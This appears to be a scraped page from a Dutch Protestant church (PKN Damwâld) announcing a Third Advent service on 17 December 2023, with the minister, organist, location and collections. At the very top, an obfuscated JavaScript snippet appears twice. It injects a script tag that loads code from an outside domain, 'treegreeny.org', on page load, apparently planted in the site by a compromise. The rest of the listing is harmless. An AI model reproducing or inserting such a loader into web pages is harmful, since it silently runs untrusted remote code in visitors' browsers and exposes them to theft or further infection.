;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 17 december 2023 14:00 uur - PKN Damwâld
zondag 17 december
14:00 uur

Kerkdienst zondag 17 december 14:00 uur

Thema: Derde Advent

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jelte Cuperus
Thema:Derde Advent
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Kerk
Tweede collecte: Adventscollecte Kerk in Actie
Uitganscollecte: Uitgangscollecte t.b.v. de gestegen energiekosten